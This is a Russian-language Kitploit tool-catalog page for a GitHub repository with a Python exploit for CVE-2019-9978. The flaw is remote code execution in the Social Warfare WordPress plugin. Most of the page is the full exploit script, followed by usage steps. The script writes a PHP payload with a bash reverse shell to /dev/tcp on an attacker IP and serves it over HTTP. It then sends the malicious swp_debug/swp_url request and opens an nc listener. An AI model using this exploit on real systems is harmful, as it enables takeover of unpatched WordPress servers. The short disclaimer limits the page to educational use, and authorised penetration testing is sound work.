Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-9978-Social-Warfare-WordPress-Plugin-RCE — Параметр `swp_debug` в `admin-post.php` позволяет удаленным атакующим включать внешние файлы, содержащие вредоносный PHP-код, который выполняется на сервере. Предоставляя специально созданный URL, содержащий полезную нагрузку обратной оболочки, атакующий может получить выполнение команд. | Kitploit
Инструменты/GitHubGitHub/housma/cve-2019-9978-social-warfare-wordpress-plugin-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного Доступа
GitHub
housma/cve-2019-9978-social-warfare-wordpress-plugin-rce

CVE-2019-9978-Social-Warfare-WordPress-Plugin-RCE

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Параметр `swp_debug` в `admin-post.php` позволяет удаленным атакующим включать внешние файлы, содержащие вредоносный PHP-код, который выполняется на сервере. Предоставляя специально созданный URL, содержащий полезную нагрузку обратной оболочки, атакующий может получить выполнение команд.

Поделиться

CVE-2019-9978 - Удаленное выполнение кода в плагине Social Warfare для WordPress

Этот репозиторий содержит рабочий эксплойт на Python для CVE-2019-9978 — уязвимости удаленного выполнения кода в плагине Social Warfare для WordPress (версии <= 3.5.2).

Описание

Параметр swp_debug в файле admin-post.php позволяет удаленным атакующим подключать внешние файлы, содержащие вредоносный PHP-код, который выполняется на сервере. Предоставляя поддельный URL, содержащий полезную нагрузку для обратного шелла, атакующий может получить выполнение команд.

Возможности эксплойта

  • Размещает PHP-полезную нагрузку с помощью встроенного HTTP-сервера Python.
  • Отправляет вредоносный параметр swp_url для запуска RCE.
  • Запускает слушатель Netcat для приема обратного шелла.
  • Автоматически записывает полезную нагрузку с правильным экранированием для успешного выполнения кода.

Требования

  • Python 3.x
  • Netcat
  • Локальное разрешение DNS для целевого домена (например, example.com привязан к IP-адресу цели)

Код эксплойта

root@kitploit:~
#!/usr/bin/env python3

import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time

# --- Config ---
TARGET_URL = "http://example.com"
ATTACKER_IP = "192.168.26.130"  # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4447
PAYLOAD_FILE = "payload.txt"

def create_payload():
    """Write exact reverse shell payload using valid PHP syntax"""
    payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
    with open(PAYLOAD_FILE, "w") as f:
        f.write(payload)
    print(f"[+] Payload written to {PAYLOAD_FILE}")

def start_http_server():
    """Serve payload over HTTP"""
    handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
        print(f"[+] HTTP server running at port {HTTP_PORT}")
        httpd.serve_forever()

def start_listener():
    """Start Netcat listener"""
    print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
    subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])

def send_exploit():
    """Trigger the exploit with vulnerable parameter"""
    payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
    exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
    print(f"[+] Sending exploit: {exploit}")
    try:
        requests.get(exploit, timeout=5)
    except requests.exceptions.RequestException:
        pass

def main():
    create_payload()

    # Start web server in background
    http_thread = threading.Thread(target=start_http_server, daemon=True)
    http_thread.start()
    time.sleep(2)  # Give server time to start

    # Start listener in background
    listener_thread = threading.Thread(target=start_listener)
    listener_thread.start()
    time.sleep(1)

    # Send the malicious request
    send_exploit()

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("[-] Interrupted by user.")

Использование

  1. Обновите ATTACKER_IP и LISTEN_PORT на IP вашей машины и желаемый порт.
  2. Убедитесь, что для целевого домена example.com разрешается правильный IP-адрес.
  3. Запустите скрипт:
root@kitploit:~
python3 exploit.py
  1. Примите обратный шелл в вашем слушателе.

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2019-9978
  • https://github.com/hash3liZer/CVE-2019-9978

Отказ от ответственности

Этот эксплойт предоставляется только для образовательных целей. Не используйте его без явного разрешения на любой системе, которая вам не принадлежит.

Скачать инструмент